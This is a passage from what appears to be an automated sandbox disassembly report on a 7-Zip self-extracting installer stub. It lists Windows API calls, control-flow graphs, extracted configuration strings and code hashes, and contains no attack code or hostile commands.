                                                        • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                        • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                        • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                        • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                        • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                        • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                      • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                      • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                        • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                        • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                        • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                      • _wtol.MSVCRT ref: 00405825
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                      • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                      • _wtol.MSVCRT ref: 00405A25
                                                      • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
                                                      • wsprintfW.USER32 ref: 00405D2A
                                                        • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                      • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                        • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                        • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                        • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                      • _wtol.MSVCRT ref: 00405F6B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                      • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                      • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                      • CoInitialize.OLE32(00000000), ref: 004062F2
                                                      • _wtol.MSVCRT ref: 00406338
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                      • GetKeyState.USER32(00000010), ref: 004063BE
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                      • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                      • _wtol.MSVCRT ref: 0040686C
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                        • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                        • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                        • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                        • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                        • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                        • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                        • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                        • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                      • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                      • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                      • API String ID: 1141480454-1804565692
                                                      • Opcode ID: c0334711d10703709c864e1cd44722a16f8881afa6fe96d19eaeb4a4b564a2b9
                                                      • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                      • Opcode Fuzzy Hash: c0334711d10703709c864e1cd44722a16f8881afa6fe96d19eaeb4a4b564a2b9
                                                      • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 724 401815-401825 725 401831-40185c call 401132 call 41017a 724->725 726 401827-40182c 724->726 731 40185e 725->731 732 40186f-40187b call 401458 725->732 727 401b6f-401b72 726->727 734 401860-40186a call 40cb68 731->734 738 401b51-401b6c ??3@YAXPAX@Z call 40cb68 732->738 739 401881-401886 732->739 740 401b6e 734->740 738->740 739->738 741 40188c-4018c2 call 401370 call 401551 call 4013a9 ??3@YAXPAX@Z 739->741 740->727 751 401b37-401b3a 741->751 752 4018c8-4018e7 741->752 753 401b3c-401b4f ??3@YAXPAX@Z call 40cb68 751->753 757 401902-401906 752->757 758 4018e9-4018fd call 40cb68 ??3@YAXPAX@Z 752->758 753->740 760 401908-40190b 757->760 761 40190d-401912 757->761 758->734 763 40193a-401951 760->763 764 401934-401937 761->764 765 401914 761->765 763->758 768 401953-401976 763->768 764->763 766 401916-40191c 765->766 770 40191e-40192f call 40cb68 ??3@YAXPAX@Z 766->770 773 401991-401997 768->773 774 401978-40198c call 40cb68 ??3@YAXPAX@Z 768->774 770->734 777 4019b3-4019c5 GetLocalTime SystemTimeToFileTime 773->777 778 401999-40199c 773->778 774->734 782 4019cb-4019ce 777->782 780 4019a5-4019b1 778->780 781 40199e-4019a0 778->781 780->782 781->766 783 4019d0-4019da call 4036f1 782->783 784 4019e7-4019ee call 403387 782->784 783->770 791 4019e0-4019e2 783->791 787 4019f3-4019f8 784->787 789 401b23-401b32 GetLastError 787->789 790 4019fe-401a01 787->790 789->751 792 401a07-401a11 ??2@YAPAXI@Z 790->792 793 401b19-401b1c 790->793 791->766 794 401a22 792->794 795 401a13-401a20 792->795 793->789 797 401a24-401a48 call 40ef4a call 40ca5c 794->797 795->797 802 401afe-401b17 call 40f707 call 40cb68 797->802 803 401a4e-401a6c GetLastError call 40133e call 4030c7 797->803 802->753 812 401aa9-401abe call 4036f1 803->812 813 401a6e-401a75 803->813 819 401ac0-401ac8 812->819 820 401aca-401ae2 call 40ca5c 812->820 815 401a79-401a89 ??3@YAXPAX@Z 813->815 817 401a91-401aa4 call 40cb68 ??3@YAXPAX@Z 815->817 818 401a8b-401a8d 815->818 817->734 818->817 819->815 826 401ae4-401af3 GetLastError 820->826 827 401af5-401afd ??3@YAXPAX@Z 820->827 826->815 827->802
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e9d201eaa13ed0c99f1289f47a79b6737f8456d04a4ba63ef490ec239e3ccbb8
                                                      • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                      • Opcode Fuzzy Hash: e9d201eaa13ed0c99f1289f47a79b6737f8456d04a4ba63ef490ec239e3ccbb8
                                                      • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1049 40236f-40238e LoadLibraryA GetProcAddress 1050 402390-40239b GetNativeSystemInfo 1049->1050 1051 40239c-40239f 1049->1051
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                      • String ID: GetNativeSystemInfo$kernel32
                                                      • API String ID: 2103483237-3846845290
                                                      • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                      • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                      • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                      • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1260 403387-40339e GetFileAttributesW 1261 4033a0-4033a2 1260->1261 1262 4033a4-4033a6 1260->1262 1263 4033fd-4033ff 1261->1263 1264 4033b5-4033bc 1262->1264 1265 4033a8-4033b3 SetLastError 1262->1265 1266 4033c7-4033ca 1264->1266 1267 4033be-4033c5 call 40335a 1264->1267 1265->1263 1268 4033fa-4033fc 1266->1268 1269 4033cc-4033dd FindFirstFileW 1266->1269 1267->1263 1268->1263 1269->1267 1271 4033df-4033f8 FindClose CompareFileTime 1269->1271 1271->1267 1271->1268
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                      • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 1799206407-0
                                                      • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                      • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                      • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                      • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                      APIs
                                                      • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                      • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: DiskFreeMessageSendSpace
                                                      • String ID:
                                                      • API String ID: 696007252-0
                                                      • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                      • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                      • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                      • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 830 404f67-404fac call 401458 * 2 memset 835 404fb8-404fbc 830->835 836 404fae-404fb1 830->836 837 404fc5-404fdf call 404a97 call 401370 835->837 838 404fbe 835->838 836->835 843 404fe1-404fe9 ??3@YAXPAX@Z 837->843 844 404ffa-405012 ShellExecuteExW 837->844 838->837 845 404fec-404ff9 ??3@YAXPAX@Z 843->845 846 405014-40501b 844->846 847 40503a-40503c 844->847 848 405028-40502b CloseHandle 846->848 849 40501d-405022 WaitForSingleObject 846->849 850 405031-405038 ??3@YAXPAX@Z 847->850 848->850 849->848 850->845
                                                      APIs
                                                      • memset.MSVCRT ref: 00404F8B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                      • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                      • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                      • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                      • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                      • String ID: $gA
                                                      • API String ID: 2700081640-3949116232
                                                      • Opcode ID: 3710b6e2b1ee8c3939e1228fdf7b12ebd08f98fec71f301bbfc3479c91d62d09
                                                      • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                      • Opcode Fuzzy Hash: 3710b6e2b1ee8c3939e1228fdf7b12ebd08f98fec71f301bbfc3479c91d62d09
                                                      • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                      • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                      • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                      • DispatchMessageW.USER32(?), ref: 00401D73
                                                      • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                      • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                      • String ID: Static
                                                      • API String ID: 2479445380-2272013587
                                                      • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                      • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                      • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                      • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 854 4036f1-403717 lstrlenW call 402771 857 403722-40372e 854->857 858 403719-40371d call 401172 854->858 860 403730-403734 857->860 861 403736-40373c 857->861 858->857 860->861 862 40373f-403741 860->862 861->862 863 403765-40376e call 401b75 862->863 866 403770-403783 GetSystemTimeAsFileTime GetFileAttributesW 863->866 867 403754-403756 863->867 870 403785-403793 call 403387 866->870 871 40379c-4037a5 call 401b75 866->871 868 403743-40374b 867->868 869 403758-40375a 867->869 868->869 876 40374d-403751 868->876 872 403760 869->872 873 403814-40381a 869->873 870->871 884 403795-403797 870->884 885 4037b6-4037b8 871->885 886 4037a7-4037b4 call 408dbf 871->886 872->863 880 403844-403857 call 408dbf ??3@YAXPAX@Z 873->880 881 40381c-403827 873->881 876->869 877 403753 876->877 877->867 897 403859-40385d 880->897 881->880 882 403829-40382d 881->882 882->880 888 40382f-403834 882->888 892 403839-403842 ??3@YAXPAX@Z 884->892 889 403808-403812 ??3@YAXPAX@Z 885->889 890 4037ba-4037d9 memcpy 885->890 886->884 888->880 894 403836-403838 888->894 889->897 895 4037db 890->895 896 4037ee-4037f2 890->896 892->897 894->892 898 4037ed 895->898 899 4037f4-403801 call 401b75 896->899 900 4037dd-4037e5 896->900 898->896 899->886 904 403803-403806 899->904 900->899 901 4037e7-4037eb 900->901 901->898 901->899 904->889 904->890
                                                      APIs
                                                      • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                      • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                        • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                        • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                      • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
